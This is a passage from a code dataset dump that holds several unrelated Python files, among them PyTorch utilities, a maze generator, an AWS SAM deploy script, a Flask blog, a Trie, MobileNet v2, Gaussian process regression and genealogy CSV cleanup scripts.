invert=False, device=None, total_length=None):\n \"\"\"\n return a boolean mask of valid positions corresponding to the given lengths.\n \"\"\"\n max_len = total_length if total_length else lens.max().item()\n valid = False if invert else True\n return torch.tensor([[valid] * l + [not valid] * (max_len - l) for l in lens.tolist()], device=device)\n\n\ndef mask_invalid_scores(scores, lens):\n \"\"\"\n returns a differentiable version of scores whose invalid positions are masked with `-np.inf`.\n \"\"\"\n valid = mask(lens, device=(scores.device), total_length=(scores.size(1)))\n while scores.dim() > valid.dim():\n valid = valid.unsqueeze(valid.dim()).expand_as(scores)\n\n neg = torch.zeros_like(valid, device=(scores.device)).float()\n neg.masked_fill_(1 - valid, -np.inf)\n return scores * valid.float() + neg","sub_path":"pycfiles/vnlp-0.0.1.macosx-10.7-x86_64.tar/functional.cpython-36.py","file_name":"functional.cpython-36.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"165430139","text":"# Compute the squares of the even numbers from 1 to 20 with a list comprehension\n# variables and scope\naList = []\nfor index in range(1, 21):\n if index % 2 == 0:\n aList.append(index * index)\nprint(aList)\n\n# list comprehension\nbList = [i * i for i in range(1, 21) if (i % 2) == 0]\n\nprint(bList)\n\nx = 100\nprint(x)\n\ndef foo():\n global x\n x = 500\n print(x)\n\n def bar():\n x = 300\n print(x)\n bar()\n print(x)\n\nif __name__ == '__main__':\n foo()\n","sub_path":"venv/mouth.py","file_name":"mouth.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"356390872","text":"\ndef write_answer(index, answer):\n print(\"Case #%s: %s\" % (index, answer))\n\n\ndef main():\n f = open(\"D-small-attempt1.in\")\n\n lines = f.readlines()\n case = lines[0].rstrip()\n\n for index in range(1, int(case) + 1):\n line = lines[index].rstrip()\n list_item = line.split()\n\n K = int(list_item[0])\n C = int(list_item[1])\n S = int(list_item[2])\n\n answer = ''\n for i in range(1, int(K) + 1):\n answer += str(i) + \" \"\n\n write_answer(index, answer)\n\n index += 1\n\n
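 # added note: C and S are read but unused in this small-input solution; e.g. K=3 prints \"Case #1: 1 2 3 \"\n 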
f.close()\n\n\nmain()\n","sub_path":"codes/CodeJamCrawler/CJ/16_0_4_caslte_2016-d.py","file_name":"16_0_4_caslte_2016-d.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"61415973","text":"#!/usr/bin/env python3\n\nimport random\nimport arcade\nimport timeit\nimport os\n\nNATIVE_SPRITE_SIZE = 128\nSPRITE_SCALING = 0.25\nSPRITE_SIZE = NATIVE_SPRITE_SIZE * SPRITE_SCALING\nSCREEN_WIDTH = 1000\nheight = 700\nSCREEN_TITLE = \"Maze Depth First Example\"\nMOVEMENT_SPEED = 8\nTILE_EMPTY = 0\nTILE_CRATE = 1\nMERGE_SPRITES = True\nVIEWPORT_MARGIN = 200\n\n\nclass Maze(arcade.SpriteList):\n def __init__(self, width, height):\n super().__init__()\n self.setup(width, height)\n\n def setup(self, width, height):\n # Create the maze\n maze = self.make_maze_depth_first(width, height)\n\n # Create sprites based on 2D grid\n if not MERGE_SPRITES:\n # This is the simple-to-understand method. Each grid location\n # is a sprite.\n for row in range(height):\n for column in range(width):\n if maze[row][column] == 1:\n wall = arcade.Sprite(\n \"local_resources/brick.png\", SPRITE_SCALING\n )\n wall.center_x = column * SPRITE_SIZE + SPRITE_SIZE / 2\n wall.center_y = row * SPRITE_SIZE + SPRITE_SIZE / 2\n self.append(wall)\n else:\n for row in range(height):\n column = 0\n while column < len(maze):\n while column < len(maze) and maze[row][column] == 0:\n column += 1\n start_column = column\n while column < len(maze) and maze[row][column] == 1:\n column += 1\n end_column = column - 1\n\n column_count = end_column - start_column + 1\n column_mid = (start_column + end_column) / 2\n\n wall = arcade.Sprite(\n \"local_resources/brick.png\",\n SPRITE_SCALING,\n repeat_count_x=column_count,\n )\n wall.center_x = column_mid * SPRITE_SIZE + SPRITE_SIZE / 2\n wall.center_y = row * SPRITE_SIZE + SPRITE_SIZE / 2\n wall.width = SPRITE_SIZE * column_count\n self.append(wall)\n\n def _create_grid_with_cells(self, width, height):\n \"\"\"Create a grid with empty cells on odd row/column combinations.\"\"\"\n grid = []\n for row in range(height):\n grid.append([])\n for column in range(width):\n if column % 2 == 1 and row % 2 == 1:\n grid[row].append(TILE_EMPTY)\n elif (\n column == 0 or row == 0 or column == width - 1 or row == height - 1\n ):\n grid[row].append(TILE_CRATE)\n else:\n grid[row].append(TILE_CRATE)\n grid[-2][-3] = TILE_EMPTY\n grid[1][0] = TILE_EMPTY\n return grid\n\n def make_maze_depth_first(self, maze_width, maze_height):\n maze = self._create_grid_with_cells(maze_width, maze_height)\n\n w = (len(maze[0]) - 1) // 2\n h = (len(maze) - 1) // 2\n vis = [[0] * w + [1] for _ in range(h)] + [[1] * (w + 1)]\n\n def walk(x: int, y: int):\n vis[y][x] = 1\n\n d = [(x - 1, y), (x, y + 1), (x + 1, y), (x, y - 1)]\n random.shuffle(d)\n for (xx, yy) in d:\n if vis[yy][xx]:\n continue\n if xx == x:\n maze[max(y, yy) * 2][x * 2 + 1] = TILE_EMPTY\n if yy == y:\n maze[y * 2 + 1][max(x, xx) * 2] = TILE_EMPTY\n\n walk(xx, yy)\n\n walk(random.randrange(w), random.randrange(h))\n\n return maze\n","sub_path":"GoblinKing/game/maze.py","file_name":"maze.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"601797805","text":"\"\"\"\nAWS Lambda and API Gateway\n\"\"\"\nfrom os import environ\n\nimport awscli.clidriver\nimport boto3\nimport yaml\n\nfrom hip_edit import resource_title\n\n\ndef main(cli_options, build_context):\n \"\"\"\n Packages and 
deploys the AWS Lambda infrastructure\n \"\"\"\n prefix = cli_options.name\n template_path = cli_options.sam_template_path\n bucket_name = cli_options.sam_bucket_name\n driver = awscli.clidriver.create_clidriver()\n packaged_template_path = _package(prefix, template_path, bucket_name, driver)\n if packaged_template_path is None:\n return None\n _configure_lambda(packaged_template_path, build_context)\n if cli_options.dry_run is True:\n return None\n stack_name = \"%sSAMStack\" % prefix\n _deploy(stack_name, packaged_template_path, driver, cli_options.role_arn)\n return _collect_outputs(stack_name)\n\n\ndef _package(prefix, template_path, bucket_name, driver):\n packaged_path = resource_title.packaged_path(template_path)\n argv = 'cloudformation package'.split()\n argv.extend(\"--template {0}\".format(template_path).split())\n argv.extend(\"--output-template-file {0}\".format(packaged_path).split())\n argv.extend(\"--s3-bucket {0}\".format(bucket_name).split())\n argv.extend(\"--s3-prefix {0}\".format(resource_title.bucket_name(prefix)).split())\n if driver.main(args=argv) == 0:\n return packaged_path\n return None\n\n\ndef _deploy(stack_name, packaged_template_path, driver, role_arn=None):\n argv = 'cloudformation deploy'.split()\n argv.extend(\"--template-file {0}\".format(packaged_template_path).split())\n argv.extend(\"--stack-name {0}\".format(stack_name).split())\n argv.extend(\"--capabilities CAPABILITY_IAM\".split())\n if role_arn:\n argv.extend(\"--role-arn {0}\".format(role_arn).split())\n driver.main(args=argv)\n\n\ndef _configure_lambda(template_path, build_context):\n model = yaml.load(file(template_path, 'r'))\n lambda_functions = ['HipEditServerApiFunction', 'HipEditLambdaAuthorizerFunction']\n for function in lambda_functions:\n lambda_vars = model['Resources'][function]['Properties']['Environment']['Variables']\n for name in lambda_vars.keys():\n value = None\n if name in environ:\n value = environ[name]\n elif name in build_context.lambda_vars():\n if name == 'npm_config_messaging_password':\n key = environ['npm_config_messaging_user']\n value = build_context.get(key, group_key=('services', 'activemq', 'users'))\n elif name == 'npm_config_auth_agent_passcode':\n key = environ['npm_config_auth_agent_login']\n value = build_context.get(key, group_key=('services', 'activemq', 'users'))\n else:\n value = build_context.get(name)\n if value:\n lambda_vars[name] = value\n\n yaml.dump(model, stream=file(template_path, 'w'), default_flow_style=False)\n\n\ndef _collect_outputs(stack_name, cloudformation=boto3.resource('cloudformation')):\n return cloudformation.Stack(stack_name).outputs\n","sub_path":"hip-edit-infra/hip_edit/sam_deployer.py","file_name":"sam_deployer.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"251857664","text":"from flask import Flask, render_template, redirect\nfrom post import Post\nimport requests\n\napp = Flask(__name__)\nr = requests.get(url='https://api.npoint.io/3a5c17a4a7337a29219f')\nr.raise_for_status()\njson_posts = r.json()\n\nall_posts = []\n\nfor p in json_posts['posts']:\n post_obj = Post(p['id'], p['title'], p['subtitle'], p['content'])\n all_posts.append(post_obj)\n print(all_posts)\n\n\n@app.route(\"/\")\ndef home():\n print(f\"from home() - {type(all_posts)}\")\n return render_template('index.html', blog_posts=all_posts)\n\n\n@app.route(\"/post/\")\ndef get_post(post_id):\n requested_post = None\n for i, pst in enumerate(all_posts):\n if 
pst.id == post_id:\n requested_post = pst\n if requested_post is not None:\n return render_template(\"post.html\", post=requested_post)\n else:\n return redirect(\"/\")\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","sub_path":"day57/jinja-magic/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"190173105","text":"class Node:\n \"\"\"\n Implementation of node for trie.\n \"\"\"\n def __init__(self):\n self.children = {}\n self.end_of_word = False\n\nclass Trie(object):\n \"\"\"\n This is an implementation of a trie.\n \"\"\"\n\n def __init__(self):\n self.root = Node()\n\n def __str__(self):\n \"\"\"Prints all of the starting nodes in trie.\"\"\"\n print(self.root.children)\n\n def insert(self,word):\n \"\"\"Inserts a word into trie.\"\"\"\n curr = self.root\n for char in word:\n node = curr.children.get(char,-1)\n if node == -1:\n node = Node()\n curr.children[char] = node\n curr = node\n curr.end_of_word = True\n\n def search(self,word):\n \"\"\"Checks to see if a word is in trie.\"\"\"\n curr = self.root\n for char in word:\n if char in curr.children:\n curr = curr.children[char]\n else:\n return False\n return curr.end_of_word == True\n\n def starts_with(self,prefix):\n \"\"\"Checks if a prefix is in the trie.\"\"\"\n curr = self.root\n for char in prefix:\n if char in curr.children:\n curr = curr.children[char]\n else:\n return False\n return True\n\n#This is intantiating an instance of a Trie class\n# trie = Trie()\n# trie.insert(\"cax\")\n# trie.__str__()\n# print(trie.starts_with(\"\"))\n# print(trie.search(\"cax\"))\n","sub_path":"data-structure-implementations/Trie/trie.py","file_name":"trie.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"111213577","text":"import csv\nimport os\nfrom tkinter import filedialog, Tk\n\ndef which_directory():\n \"\"\"This function provides an easy GUI for the user to select the\n working directory of the files.\"\"\"\n # Ask for the directory to get the files from\n root = Tk().withdraw() # .withdraw() hides that second blank window\n # This sets to the users home directory\n init_dir = os.path.expanduser('~')\n # These options in .askdirectory seem to get the job done!\n filedirectory = filedialog.askdirectory(initialdir=init_dir,\n title='Please select a directory')\n return filedirectory\n\ndef makeNodes(anonymized):\n # Cleanup Family Finder Matches file and create nodes.csv\n for filename in os.listdir(file_directory):\n if 'Matches' in filename:\n with open(os.path.join(file_directory, filename), 'r', encoding=\"UTF8\") as ffile:\n # Create empty nodes list\n nodes = []\n readnodes = csv.reader(ffile)\n # Pump file contents into nodes list\n for row in readnodes:\n nodes.append(row)\n # Read the column names from the first line of the file\n nodeHeader = nodes[0]\n # Fix ID column header\n if nodeHeader[11] == \"ResultID2\":\n nodeHeader[11] = nodeHeader[11].replace(\"ResultID2\", \"ID\")\n print(\"Fixed ID Header\")\n else:\n print(\"ID Header OK\")\n # Fix Label column header\n if nodeHeader[13] == \"Name\":\n nodeHeader[13] = nodeHeader[13].replace(\"Name\", \"Label\")\n print(\"Fixed Label Header\")\n else:\n print(\"Label Header OK\")\n # Pop off first row (the headers)\n nodes.pop(0)\n # Now we have Headers and nodes objects\n # Figure out working directory\n #workPath = os.path(file_directory)\n if 
anonymized == \"y\":\n nodeFile = str(file_directory + '/nodesAnonymized.csv')\n else:\n nodeFile = str(file_directory + '/nodes.csv')\n #print(\"DEBUG- \", nodeFile)\n # If nodes.csv exists, delete it\n if os.path.isfile(nodeFile):\n try:\n os.unlink(nodeFile)\n print(\"Removed previous nodes.csv file.\")\n except:\n print(\"No previous nodes.csv file found.\")\n # Generate file based on Anonymized data or not\n if anonymized == \"y\":\n # Write the Header and nodes to file\n with open(nodeFile, 'w', encoding=\"UTF8\", newline='') as outfile:\n writenodes = csv.writer(outfile)\n writenodes.writerow([nodeHeader[1], nodeHeader[2], nodeHeader[3], nodeHeader[4],\n nodeHeader[5], nodeHeader[6], nodeHeader[8], nodeHeader[9],\n nodeHeader[10], nodeHeader[11], nodeHeader[12],\n nodeHeader[13]])\n for row in nodes:\n writenodes.writerow([row[1], row[2], row[3], row[4],\n row[5], row[6], row[8], row[9],\n row[10], row[11], row[12], row[11]])\n else:\n with open(nodeFile, 'w', encoding=\"UTF8\", newline='') as outfile:\n writenodes = csv.writer(outfile)\n writenodes.writerow([nodeHeader[0], nodeHeader[1], nodeHeader[2], nodeHeader[3],\n nodeHeader[4], nodeHeader[5], nodeHeader[6], nodeHeader[7],\n nodeHeader[8], nodeHeader[9], nodeHeader[10],\n nodeHeader[11], nodeHeader[12], nodeHeader[13]])\n for row in nodes:\n writenodes.writerow([row[0], row[1], row[2], row[3], row[4],\n row[5], row[6], row[7], row[8], row[9],\n row[10], row[11], row[12], row[13]])\n print(\"Created nodes.csv file\")\n\ndef makeEdges():\n # Cleanup ICW file and create edges.csv\n for filename in os.listdir(file_directory):\n if 'ICW' in filename:\n with open(os.path.join(file_directory, filename), 'r', encoding=\"UTF8\") as ffile:\n # Create empty edges list\n edges = []\n # Open the file\n #with open(ffile, 'r', encoding=\"UTF8\") as infile:\n readedges = csv.reader(ffile)\n # Pump file contents into edges list\n for row in readedges:\n edges.append(row)\n # Read the column names from the first line of the file\n edgesHeader = edges[0]\n # Fix ID column header\n if edgesHeader[5] == \"Profile KitID\":\n edgesHeader[5] = edgesHeader[5].replace(\"Profile KitID\", \"Source\")\n print(\"Fixed Source Header\")\n else:\n print(\"Source Header OK\")\n # Fix Label column header\n if edgesHeader[6] == \"Match KitID\":\n edgesHeader[6] = edgesHeader[6].replace(\"Match KitID\", \"Target\")\n print(\"Fixed Target Header\")\n else:\n print(\"Target Header OK\")\n # Pop off first row (the headers)\n edges.pop(0)\n # Now we have Headers and nodes objects\n\n # Build edgeFile\n #workPath = os.path(file_directory)\n edgeFile = str(file_directory + '/edges.csv')\n # If edges.csv exists, delete it\n if os.path.isfile(edgeFile):\n try:\n os.unlink(edgeFile)\n print(\"Removed previous edges.csv file.\")\n except:\n print(\"No previous edges.csv file found.\")\n # Write the Header and nodes to file\n with open(edgeFile, 'w', encoding=\"UTF8\", newline='') as outfile:\n writeedges = csv.writer(outfile)\n writeedges.writerow([edgesHeader[5], edgesHeader[6]])\n for row in edges:\n writeedges.writerow([row[5], row[6]])\n print(\"Created edges.csv file\")\n\n\nprint(\"Let's clean some data!\")\nuserInput = input(\"Make data anonymized? (y/n) \")\nprint(\"What directory holds your files?\")\nfile_directory = which_directory()\nprint(\"We'll start with Family Finder Match data.\")\nmakeNodes(userInput)\nprint(\"Great! Now let's prep the ICW data\")\nmakeEdges()\nprint(\"OK. 
That should do it.\")\n","sub_path":"cleanFTDNA.py","file_name":"cleanFTDNA.py","file_ext":"py","file_size_in_byte":6877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"301809410","text":"import torch\nimport torch.nn.functional as F\nimport numpy as np\nfrom collections import OrderedDict\nfrom easydict import EasyDict\nfrom _main_base import main\nimport os\n\n#---\n# config\n#---\ncfg = EasyDict()\n\n# class\ncfg.CLASS_LABEL = ['akahara', 'madara']\ncfg.CLASS_NUM = len(cfg.CLASS_LABEL)\n\n# model\ncfg.INPUT_HEIGHT = 64\ncfg.INPUT_WIDTH = 64\ncfg.INPUT_CHANNEL = 3\n\ncfg.GPU = False\ncfg.DEVICE = torch.device(\"cuda\" if cfg.GPU and torch.cuda.is_available() else \"cpu\")\n\ncfg.MODEL_SAVE_PATH = 'models/MobileNet_v2_{}.pt'\ncfg.MODEL_SAVE_INTERVAL = 200\ncfg.ITERATION = 1000\ncfg.MINIBATCH = 8\ncfg.OPTIMIZER = torch.optim.SGD\ncfg.LEARNING_RATE = 0.01\ncfg.MOMENTUM = 0.9\ncfg.LOSS_FUNCTION = loss_fn = torch.nn.NLLLoss()\n\ncfg.TRAIN = EasyDict()\ncfg.TRAIN.DISPAY_ITERATION_INTERVAL = 50\n\ncfg.TRAIN.DATA_PATH = '../Dataset/train/images/'\ncfg.TRAIN.DATA_HORIZONTAL_FLIP = True\ncfg.TRAIN.DATA_VERTICAL_FLIP = True\ncfg.TRAIN.DATA_ROTATION = False\n\ncfg.TEST = EasyDict()\ncfg.TEST.MODEL_PATH = cfg.MODEL_SAVE_PATH.format('final')\ncfg.TEST.DATA_PATH = '../Dataset/test/images/'\ncfg.TEST.MINIBATCH = 2\n\n# random seed\ntorch.manual_seed(0)\n\n\nclass MobileNet_v2(torch.nn.Module): \n def __init__(self):\n super(MobileNet_v2, self).__init__()\n \n # define block\n class MobileNetBlock(torch.nn.Module):\n def __init__(self, in_dim, out_dim, stride=1, expansion_t=6, split_division_by=8):\n super(MobileNetBlock, self).__init__()\n \n self.module = torch.nn.Sequential(\n torch.nn.Conv2d(in_dim, in_dim * expansion_t, kernel_size=1, padding=0, stride=1, groups=in_dim),\n torch.nn.BatchNorm2d(in_dim * expansion_t),\n torch.nn.ReLU6(),\n torch.nn.Conv2d(in_dim * expansion_t, in_dim * expansion_t, kernel_size=3, padding=1, stride=stride, groups=split_division_by),\n torch.nn.BatchNorm2d(in_dim * expansion_t),\n torch.nn.ReLU6(),\n torch.nn.Conv2d(in_dim * expansion_t, out_dim, kernel_size=1, padding=0, stride=1),\n torch.nn.BatchNorm2d(out_dim),\n )\n \n def forward(self, _input):\n x = self.module(_input)\n \n # if shape matches, add skip connection\n if x.size() == _input.size():\n x = x + _input\n \n return x\n \n # define feature dimension flattening layer\n class Flatten(torch.nn.Module):\n def forward(self, x):\n x = x.view(x.size()[0], -1)\n return x\n \n self.module = torch.nn.Sequential(\n # input\n # 224 x 224 x 3\n torch.nn.Conv2d(cfg.INPUT_CHANNEL, 32, kernel_size=3, padding=1, stride=2),\n torch.nn.BatchNorm2d(32),\n torch.nn.ReLU6(),\n # 112 x 112 x 32\n MobileNetBlock(32, 16, expansion_t=1),\n # 112 x 112 x 16\n MobileNetBlock(16, 24, stride=2),\n MobileNetBlock(24, 24),\n # 56 x 56 x 24\n MobileNetBlock(24, 32, stride=2),\n MobileNetBlock(32, 32),\n MobileNetBlock(32, 32),\n # 28 x 28 x 32\n MobileNetBlock(32, 64, stride=2),\n MobileNetBlock(64, 64),\n MobileNetBlock(64, 64),\n MobileNetBlock(64, 64),\n # 14 x 14 x 64\n MobileNetBlock(64, 96),\n MobileNetBlock(96, 96),\n MobileNetBlock(96, 96),\n # 14 x 14 x 96\n MobileNetBlock(96, 160, stride=2),\n MobileNetBlock(160, 160),\n MobileNetBlock(160, 160),\n # 7 x 7 x 160\n MobileNetBlock(160, 320),\n # 7 x 7 x 320\n torch.nn.Conv2d(320, 1280, kernel_size=1, padding=0, stride=1),\n torch.nn.BatchNorm2d(1280),\n torch.nn.ReLU6(),\n # 7 x 7 x 1280\n torch.nn.AdaptiveAvgPool2d([1, 
1]),\n Flatten(),\n # 1 x 1 x 1280\n torch.nn.Linear(1280, cfg.CLASS_NUM),\n torch.nn.Softmax(dim=1)\n )\n\n \n def forward(self, x):\n x = self.module(x)\n return x\n\n# main\nif __name__ == '__main__':\n\n model_save_dir = '/'.join(cfg.MODEL_SAVE_PATH.split('/')[:-1])\n os.makedirs(model_save_dir, exist_ok=True)\n\n main(cfg, MobileNet_v2())","sub_path":"Scripts_Model/scripts_pytorch/MobileNet_v2_pytorch.py","file_name":"MobileNet_v2_pytorch.py","file_ext":"py","file_size_in_byte":4449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"504679872","text":"#!/gpfsm/dulocal/sles11/other/SLES11.3/miniconda3/2019.03_py3.7/2019-05-15/bin/python\n\nimport numpy as np\nimport csv\nimport sys\nimport datetime as dt\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\n\n######### Set up some lists for the data ################\nx = []\nObservedSM = []\nnoahSM = []\nNoahGPR = []\np = []\niSSE = []\n\n######## import all the data ########################3## \nwith open('site.txt', 'r') as siteFile:\n site = str(siteFile.read())\nwith open('output.gpr', 'r') as gprFile:\n gprData = csv.reader(gprFile, delimiter=' ', skipinitialspace=True)\n for gprRow in gprData:\n NoahGPR.append(float(gprRow[10]))\n NoahGPR = np.array(NoahGPR)\nwith open('obs.txt', 'r') as obsFile:\n obsData = csv.reader(obsFile, delimiter=' ', skipinitialspace=True)\n for obsRow in obsData:\n ObservedSM.append(float(obsRow[5]))\n ObservedSM = np.array(ObservedSM)\nwith open('output.noah', 'r') as oFile:\n fData = csv.reader(oFile, delimiter=' ', skipinitialspace=True )\n for row in fData:\n D = dt.datetime(int(row[0]),1,1) + \\\n dt.timedelta((int(row[1])-1) + float(row[2])/24)\n x.append(D)\n p.append(float(row[9]))\n noahSM.append(float(row[10]))\n noahSM = np.array(noahSM)\n x = np.array(x)\n\nfor t in range(ObservedSM.shape[0]):\n if ObservedSM[t] > 0:\n iSSE.append(t)\n\n################# Calculate some statistics #### \n# Mean divergence\nMD = np.sum((np.mean(ObservedSM[iSSE]) - ObservedSM[iSSE])**2)\n#Sum of squared error\nSSE_noah_only = np.sum((ObservedSM[iSSE] - noahSM[iSSE])**2)\nSSE_noah_gpr = np.sum((ObservedSM[iSSE] - NoahGPR[iSSE])**2)\n#Nash sutcliffe efficiency\nNS_noah_gpr = 1 - (SSE_noah_gpr/MD)\nNS_noah_only = 1 - (SSE_noah_only/MD)\nprint('The Nash-Sutcliffe Efficiency is')\nprint('For Noah alone: ', str(NS_noah_only))\nprint('For Noah with GPR: ', str(NS_noah_gpr))\n# Root Mean Square Error\na = 0\nb = ObservedSM.shape[0]\nprint('The RMSE is')\nprint('For Noah alone: ', str(np.sqrt(SSE_noah_only/len(iSSE))))\nprint('For Noah with GPR: ', str(np.sqrt(SSE_noah_gpr/len(iSSE))))\n\n# Start plot\nsp = int(input('what day of the record to start the plot? 
I recommend 0\\n'))*48\n# end plot\nprint('The total number of days in the output file is: ', str(int(np.floor(len(x)/48))))\nprint('What dey of record do you want to end want to plot?') \nep = int(input('It needs to be greater than when it started\\n'))*48\nep = int(max(sp+48,np.floor(ep)))\n\nprint('plotting')\nfig, ax1 = plt.subplots(figsize=(15,10))\nax1.plot(x[sp:ep],ObservedSM[sp:ep], label='Observed soil moisture', color='k', linewidth=0.5)\nax1.plot(x[sp:ep],noahSM[sp:ep], label='Noah prediction', color='b', linewidth=0.5)\nax1.plot(x[sp:ep],NoahGPR[sp:ep], '--', label='NoahMP with GPR prediction', color='r', linewidth=1.0)\nax1.set_ylabel('Soil moisture')\nax1.set_ylim([0,np.max(ObservedSM[sp:ep])])\nplt.legend(loc='upper left')\nax2 = ax1.twinx()\nax2.plot(x[sp:ep],p[sp:ep], label='precipitation', linewidth=0.1, color='grey')\nax2.set_ylabel('precip')\nplt.title(\"Site \"+site)\nplt.legend(loc='upper right')\nfig.tight_layout() # otherwise the right y-label is slightly clipped\nplt.show()\n","sub_path":"setup_dir/gpr/plot_gprNoah_output_print_results.py","file_name":"plot_gprNoah_output_print_results.py","file_ext":"py","file_size_in_byte":3167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"236194083","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 8 15:10:13 2021\r\n\r\n@author: Felix\r\n\"\"\"\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib as mpl\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport sklearn\r\nfrom sklearn import neighbors\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn import preprocessing\r\nfrom sklearn.model_selection import GridSearchCV\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\nfrom keras.models import Sequential\r\nfrom keras.wrappers.scikit_learn import KerasClassifier\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nfrom tensorflow.keras.layers import Dropout, Dense\r\nfrom datetime import datetime\r\nfrom sklearn.gaussian_process.kernels \\\r\nimport RBF, WhiteKernel, RationalQuadratic, ExpSineSquared\r\nfrom sklearn.gaussian_process.kernels import ConstantKernel as C\r\n\r\nfrom sklearn.gaussian_process import GaussianProcessRegressor\r\n\r\n\r\n\r\ndf_building = pd.read_excel('Clean_Set.xlsx',sheet_name = None)\r\n\r\ndf_building_clean = {}\r\nfor k1 in df_building.keys():\r\n df_building_clean[k1] = df_building.get(k1).drop('Unnamed: 0',axis=1)\r\n \r\n \r\nFloor1S_heads = list(df_building_clean.get('Floor1S').columns)\r\nFloor1W_heads = list(df_building_clean.get('Floor1W').columns)\r\nFloor2S_heads = list(df_building_clean.get('Floor2S').columns)\r\nFloor2W_heads = list(df_building_clean.get('Floor2W').columns)\r\nFloor3_heads = list(df_building_clean.get('Floor3').columns)\r\nFloor4_heads = list(df_building_clean.get('Floor4').columns)\r\n\r\nTime_2W = df_building_clean.get('Floor1S')[['Time']]\r\n\r\n\r\n\r\nX = df_building_clean.get('Floor1S')[['AP_Total']].values\r\nX = (np.atleast_2d(X))\r\n\r\ny = df_building_clean.get('Floor1S')[['Groundtruth']].iloc[:,0].values\r\ny = y.reshape(-1,1)\r\nx = (np.atleast_2d(np.linspace(1,100,287))).T\r\n\r\nX2 = df_building_clean.get('Floor1W')[['AP_Total']].values\r\nX2 = (np.atleast_2d(X2))\r\ny2 = df_building_clean.get('Floor1W')[['Groundtruth']].iloc[:,0].values\r\ny2 = y2.reshape(-1,1)\r\nx2 = (np.atleast_2d(np.linspace(1,100,127))).T\r\n\r\n\r\n# Kernel with parameters given in GPML book\r\nk1 = 30.0**2 * RBF(length_scale=35) # long term smooth rising 
k1 = 30.0**2 * RBF(length_scale=35) # long term smooth rising trend\r\n\r\nk4 = 4**2 * RBF(length_scale=1) \\\r\n + WhiteKernel(noise_level=5**2) # noise terms\r\nkernel = k1 + k4\r\n\r\ngp = GaussianProcessRegressor(kernel=kernel,optimizer='fmin_l_bfgs_b', n_restarts_optimizer=20,normalize_y=True)\r\ngp.fit(X,y)\r\n\r\nprint(\"\\nLearned kernel: %s\" % gp.kernel_)\r\nprint(\"Log-marginal-likelihood: %.3f\"\r\n % gp.log_marginal_likelihood(gp.kernel_.theta))\r\n\r\nX_ = np.linspace(X.min(), X.max() + 30, 1000)[:, np.newaxis]\r\ny_pred, y_std = gp.predict(X_, return_std=True)\r\n\r\n\r\n\r\nplt.figure(figsize=(10,7))\r\nplt.scatter(X, y, c='k',label='Data points')\r\nplt.plot(X_, y_pred, 'g',label='Mean of predictive distribution')\r\n\r\n\r\n\r\ny_pred = np.reshape(y_pred,-1)\r\nplt.fill_between(X_[:, 0], (y_pred - y_std), (y_pred + y_std),\r\n alpha=0.5, color='b',label='Standard deviation of predictive distribution')\r\n\r\nplt.xlim(X_.min(), X_.max())\r\n\r\nplt.xlabel(\"AP_Total\")\r\nplt.ylabel(r\"Occupancy count\")\r\nplt.title(r\"Gaussian process, 1st-Floor\")\r\nplt.legend(loc='lower center')\r\nplt.show()\r\n\r\ny_pred2, sigma = gp.predict(X, return_std=True)\r\n\r\nw_2 = sklearn.metrics.r2_score(y, y_pred2) # r2_score expects (y_true, y_pred)\r\n\r\nplt.figure(figsize=(12,5))\r\nplt.title('Model_gauss 1st-FloorS vs. Data 1st-FloorS, [R_2:%s] ' %w_2, fontsize=15, color= 'black', y= 1.1)\r\nplt.plot(x, y_pred2,'bo',markersize=5,label='Prediction')\r\nplt.plot(x, y,'ro',markersize=5,label='Groundtruth')\r\nplt.legend(loc='upper center')\r\nplt.xlabel('Time_steps')\r\nplt.ylabel('Occupancy-count')\r\nplt.grid(True)\r\n\r\n\r\n\r\n\r\ny_pred3, sigma2 = gp.predict(X2, return_std=True)\r\n\r\nw_2 = sklearn.metrics.r2_score(y2, y_pred3)\r\n\r\n\r\n\r\nplt.figure(figsize=(12,5))\r\nplt.title('Model_gauss 1st-FloorS vs. Data 1st-FloorW, [R_2:%s] ' %w_2, fontsize=15, color= 'black', y= 1.1)\r\nplt.plot(x2, y_pred3,'bo',markersize=5,label='Prediction')\r\nplt.plot(x2, y2,'ro',markersize=5,label='Groundtruth')\r\nplt.legend(loc='upper center')\r\nplt.xlabel('Time_steps')\r\nplt.ylabel('Occupancy-count')\r\nplt.grid(True)","sub_path":"Gauß/1st_Floor_plots/Gauß_1stF.py","file_name":"Gauß_1stF.py","file_ext":"py","file_size_in_byte":4071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"579076557","text":"import sys\nsys.path.append('./CRAFTpytorch/')\n# sys.path.append('./CRAFTpytorch/test.py')\nimport os\nimport time\nimport argparse\nimport gradio as gr\nimport json\n\nimport torch\nimport math\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nfrom torch.autograd import Variable\nfrom PIL import ImageFont, ImageDraw, Image\n\nimport cv2\nfrom 